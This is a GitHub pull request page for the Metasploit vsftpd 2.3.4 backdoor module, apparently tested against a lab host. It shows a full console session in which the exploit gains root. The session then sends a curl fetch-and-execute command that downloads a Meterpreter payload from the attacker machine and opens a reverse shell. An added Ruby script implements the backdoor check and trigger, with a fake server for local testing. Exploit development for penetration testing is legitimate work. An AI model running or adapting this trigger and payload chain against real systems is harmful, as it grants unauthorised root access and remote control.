
vsftpd_234_backdoor: Improve single shot backdoor handling#21377

Open
g0tmi1k wants to merge 7 commits into rapid7:master from g0tmi1k:vsftpd_234_backdoor

Conversation


@g0tmi1k g0tmi1k commented Apr 26, 2026

This PR is for:

  • More success when repeating the check/exploit.
  • Update wording
  • Update metadata (notes)

After

[*] Connected to the database specified in the YAML file
[*] Connected to msf. Connection type: postgresql. Connection name: OYGIkFxA.
[*] Deleted workspace: default
[*] Recreated the default workspace
VERBOSE => true
RHOSTS => 10.0.0.10
LHOST => tap0
msf >
msf > git checkout vsftpd_234_backdoor
[*] exec: git checkout vsftpd_234_backdoor

Already on 'vsftpd_234_backdoor'
Your branch is up to date with 'origin/vsftpd_234_backdoor'.
msf >
msf > use vsftpd_234_backdoor

Matching Modules
================

   #  Name                                  Disclosure Date  Rank       Check  Description
   -  ----                                  ---------------  ----       -----  -----------
   0  exploit/unix/ftp/vsftpd_234_backdoor  2011-07-03       excellent  Yes    VSFTPD 2.3.4 Backdoor Command Execution


Interact with a module by name or index. For example info 0, use 0 or use exploit/unix/ftp/vsftpd_234_backdoor

[*] Using exploit/unix/ftp/vsftpd_234_backdoor
[*] Using configured payload cmd/linux/http/x86/meterpreter_reverse_tcp
msf exploit(unix/ftp/vsftpd_234_backdoor) >
msf exploit(unix/ftp/vsftpd_234_backdoor) > options

Module options (exploit/unix/ftp/vsftpd_234_backdoor):

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   RHOSTS  10.0.0.10        yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT   21               yes       The target port (TCP)


Payload options (cmd/linux/http/x86/meterpreter_reverse_tcp):

   Name            Current Setting  Required  Description
   ----            ---------------  --------  -----------
   FETCH_COMMAND   CURL             yes       Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
   FETCH_DELETE    false            yes       Attempt to delete the binary after execution
   FETCH_FILELESS  none             yes       Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8, tested shells are sh, bash,
                                              zsh) (Accepted: none, python3.8+, shell-search, shell)
   FETCH_SRVHOST                    no        Local IP to use for serving payload
   FETCH_SRVPORT   8080             yes       Local port to use for serving payload
   FETCH_URIPATH                    no        Local URI to use for serving payload
   LHOST           tap0             yes       The listen address (an interface may be specified)
   LPORT           4444             yes       The listen port


   When FETCH_COMMAND is one of CURL,GET,WGET:

   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   FETCH_PIPE  false            yes       Host both the binary payload and the command so it can be piped directly to the shell.


   When FETCH_FILELESS is none:

   Name                Current Setting  Required  Description
   ----                ---------------  --------  -----------
   FETCH_FILENAME      scWYMbcGl        no        Name to use on remote system when storing payload; cannot contain spaces or slashes
   FETCH_WRITABLE_DIR  ./               yes       Remote writable dir to store payload; cannot contain spaces


Exploit target:

   Id  Name
   --  ----
   0   Linux/Unix Command



View the full module info with the info, or info -d command.

msf exploit(unix/ftp/vsftpd_234_backdoor) >
msf exploit(unix/ftp/vsftpd_234_backdoor) > check
[*] 10.0.0.10:21 - Checking if backdoor has already been triggered (else exploit will fail)
[-] 10.0.0.10:21 - The port used by the backdoor bind listener is already open/in-use (6200/TCP)
[*] 10.0.0.10:21 - Cannot reliably check exploitability. Backdoor bind listener port 6200 is already open
msf exploit(unix/ftp/vsftpd_234_backdoor) >
msf exploit(unix/ftp/vsftpd_234_backdoor) > ssh1 msfadmin@10.0.0.10 sudo reboot -f
[*] exec: ssh1 msfadmin@10.0.0.10 sudo reboot -f

/etc/ssh/ssh_config line 52: Unsupported option "gssapiauthentication"
msfadmin@10.0.0.10's password:
[sudo] password for msfadmin: msfadmin

packet_write_wait: Connection to 10.0.0.10 port 22: Broken pipe
msf exploit(unix/ftp/vsftpd_234_backdoor) >
msf exploit(unix/ftp/vsftpd_234_backdoor) > check
[*] 10.0.0.10:21 - Checking if backdoor has already been triggered (else exploit will fail)
[*] 10.0.0.10:21 - Connecting to FTP service
[*] 10.0.0.10:21 - Checking FTP banner
[*] 10.0.0.10:21 - FTP banner: 220 (vsFTPd 2.3.4)
[*] 10.0.0.10:21 - FTP banner hints it's vulnerable: 220 (vsFTPd 2.3.4)
[*] 10.0.0.10:21 - Trying to log into FTP (User: 2wF7)
[*] 10.0.0.10:21 - The target appears to be vulnerable. vsftpd 2.3.4 banner detected; backdoor may be present
msf exploit(unix/ftp/vsftpd_234_backdoor) >
msf exploit(unix/ftp/vsftpd_234_backdoor) > workspace -v

Workspaces
==========

current  name     hosts  services  vulns  creds  loots  notes
-------  ----     -----  --------  -----  -----  -----  -----
*        default  1      1         0      0      0      0

msf exploit(unix/ftp/vsftpd_234_backdoor) >
msf exploit(unix/ftp/vsftpd_234_backdoor) > run
[*] Command to run on remote host: curl -so ./VyZFRFPLiW http://10.0.0.1:8080/w5F5mvQl1V5uSRj-6oaPrQ;chmod +x ./VyZFRFPLiW;./VyZFRFPLiW&
[*] Fetch handler listening on 10.0.0.1:8080
[*] HTTP server started
[*] Adding resource /w5F5mvQl1V5uSRj-6oaPrQ
[*] Started reverse TCP handler on 10.0.0.1:4444
[*] 10.0.0.10:21 - Running automatic check ("set AutoCheck false" to disable)
[*] 10.0.0.10:21 - Checking if backdoor has already been triggered (else exploit will fail)
[*] 10.0.0.10:21 - Connecting to FTP service
[*] 10.0.0.10:21 - Checking FTP banner
[*] 10.0.0.10:21 - FTP banner: 220 (vsFTPd 2.3.4)
[*] 10.0.0.10:21 - FTP banner hints it's vulnerable: 220 (vsFTPd 2.3.4)
[*] 10.0.0.10:21 - Trying to log into FTP (User: M)
[+] 10.0.0.10:21 - The target appears to be vulnerable. vsftpd 2.3.4 banner detected; backdoor may be present
[*] 10.0.0.10:21 - Connecting to FTP service
[*] 10.0.0.10:21 - Checking FTP banner
[*] 10.0.0.10:21 - FTP banner: 220 (vsFTPd 2.3.4)
[*] 10.0.0.10:21 - Trying to log into FTP via backdoor. User: KZG6g1:)
[*] 10.0.0.10:21 - 331 Please specify the password.
[*] 10.0.0.10:21 - Trying to log into FTP via backdoor. Password: F
[*] 10.0.0.10:21 - Connecting to backdoor on 6200/TCP
[+] 10.0.0.10:21 - Backdoor has been spawned!
[*] 10.0.0.10:21 - Trying 'id' command
[+] 10.0.0.10:21 - UID: uid=0(root) gid=0(root)
[*] 10.0.0.10:21 - Running: curl -so ./VyZFRFPLiW http://10.0.0.1:8080/w5F5mvQl1V5uSRj-6oaPrQ;chmod +x ./VyZFRFPLiW;./VyZFRFPLiW&
[*] Client 10.0.0.10 requested /w5F5mvQl1V5uSRj-6oaPrQ
[*] Sending payload to 10.0.0.10 (curl/7.18.0 (i486-pc-linux-gnu) libcurl/7.18.0 OpenSSL/0.9.8g zlib/1.2.3.3 libidn/1.1)
[*] Meterpreter session 1 opened (10.0.0.1:4444 -> 10.0.0.10:35162) at 2026-04-26 21:28:40 +0100

meterpreter > background
[*] Backgrounding session 1...
msf exploit(unix/ftp/vsftpd_234_backdoor) >
msf exploit(unix/ftp/vsftpd_234_backdoor) > workspace -v

Workspaces
==========

current  name     hosts  services  vulns  creds  loots  notes
-------  ----     -----  --------  -----  -----  -----  -----
*        default  1      1         1      0      0      1

msf exploit(unix/ftp/vsftpd_234_backdoor) >
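The check and trigger sequence visible in the session above (probe the backdoor bind port 6200 first, then the banner, then a harmless USER; to exploit, send a USER ending in ":)" plus any PASS and talk to the shell on 6200), as an added Ruby example that is not the module's code and not part of this PR. FakeVsftpd is a constructed loopback stand-in for a backdoored vsftpd 2.3.4 that uses dynamic ports instead of 21 and 6200; the timeouts, the fixed "x" / "probe" usernames and the one-second wait are assumptions for the demo.

```ruby
require 'socket'
require 'timeout'

VULN_BANNER   = /vsFTPd 2\.3\.4/
BACKDOOR_PORT = 6200   # bind port the vsftpd 2.3.4 backdoor listens on
TRIGGER       = ':)'   # USER suffix that spawns that listener

# Single-shot listener: once the port is open a new trigger spawns nothing.
def backdoor_port_open?(host, port = BACKDOOR_PORT, timeout: 3)
  Timeout.timeout(timeout) { TCPSocket.new(host, port).close }
  true
rescue Errno::ECONNREFUSED, Errno::EHOSTUNREACH, Timeout::Error, SocketError
  false
end

def banner_vulnerable?(banner)
  VULN_BANNER.match?(banner)
end

# Same order as the module: backdoor port, banner, then a harmless USER.
def check(host, port: 21, backdoor_port: BACKDOOR_PORT, timeout: 5)
  return :already_open if backdoor_port_open?(host, backdoor_port)
  ftp = Timeout.timeout(timeout) { TCPSocket.new(host, port) }
  Timeout.timeout(timeout) do
    next :safe unless banner_vulnerable?(ftp.gets.to_s)
    ftp.write("USER probe\r\n")            # no ":)" here: must not trigger anything
    ftp.gets.to_s.start_with?('331') ? :appears : :unknown
  end
rescue Errno::ECONNREFUSED, Timeout::Error, SocketError
  :unknown
ensure
  ftp&.close
end

# USER ending in ":)" plus any PASS, then one command on the bind port.
def trigger(host, port: 21, backdoor_port: BACKDOOR_PORT, cmd: 'id', wait: 1)
  ftp = TCPSocket.new(host, port)
  ftp.gets                                 # 220 banner
  ftp.write("USER x#{TRIGGER}\r\n")
  ftp.gets                                 # 331 Please specify the password.
  ftp.write("PASS x\r\n")                  # the password is irrelevant
  sleep wait                               # give the listener time to bind
  shell = TCPSocket.new(host, backdoor_port)
  shell.write("#{cmd}\n")
  Timeout.timeout(5) { shell.gets.to_s.strip }
rescue Errno::ECONNREFUSED
  nil                                      # listener never appeared
ensure
  ftp&.close
  shell&.close
end

# Constructed loopback stand-in for a backdoored vsftpd 2.3.4 (a test double, not the real daemon).
class FakeVsftpd
  attr_reader :host, :ftp_port, :backdoor_port
  def initialize(host = '127.0.0.1')
    @host, @ftp = host, TCPServer.new(host, 0)
    @ftp_port = @ftp.addr[1]
    tmp = TCPServer.new(host, 0)           # reserve a port; bind it only when triggered
    @backdoor_port = tmp.addr[1]
    tmp.close
    Thread.new { loop { Thread.new(@ftp.accept) { |c| serve_ftp(c) } } }
  end
  def serve_ftp(c)
    c.write("220 (vsFTPd 2.3.4)\r\n")
    while (line = c.gets)
      verb, arg = line.strip.split(' ', 2)
      if verb == 'USER'
        open_backdoor if arg.to_s.end_with?(TRIGGER)   # the real backdoor fires on USER
        c.write("331 Please specify the password.\r\n")
      else
        c.write("530 Login incorrect.\r\n")
      end
    end
  rescue IOError, Errno::ECONNRESET, Errno::EPIPE
  ensure
    c.close
  end
  def open_backdoor
    return if @backdoor                    # already spawned: nothing more happens
    @backdoor = TCPServer.new(@host, @backdoor_port)
    Thread.new do
      loop do
        Thread.new(@backdoor.accept) do |s|   # a "root shell" that only knows 'id'
          while (cmd = s.gets)
            s.write(cmd.strip == 'id' ? "uid=0(root) gid=0(root)\n" : "sh: #{cmd.strip}: not found\n")
          end
          s.close
        end
      end
    end
  end
end

srv = FakeVsftpd.new
o = { port: srv.ftp_port, backdoor_port: srv.backdoor_port }
puts [check(srv.host, **o), trigger(srv.host, **o), check(srv.host, **o)].inspect
# => [:appears, "uid=0(root) gid=0(root)", :already_open]
```

The third result is the single-shot state the PR's check output reports: after one trigger the bind port stays open (on the real host until the daemon is restarted, which is why the session above reboots the target), so the check returns :already_open rather than re-running the banner logic and claiming a fresh exploit will work.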

g0tmi1k force-pushed the vsftpd_234_backdoor branch 6 times, most recently from ed17bda to 84ff0f0 on May 5, 2026 10:59
g0tmi1k force-pushed the vsftpd_234_backdoor branch 2 times, most recently from ef514f5 to dd6c58b on May 5, 2026 17:47

g0tmi1k commented May 5, 2026

This now needs #21380 to be merged ahead of time.

g0tmi1k force-pushed the vsftpd_234_backdoor branch 9 times, most recently from da4edb2 to d6de03c on May 6, 2026 14:45
g0tmi1k force-pushed the vsftpd_234_backdoor branch from d6de03c to 1909a6f on May 6, 2026 16:32
Labels

None yet

Projects

Status: Todo

2 participants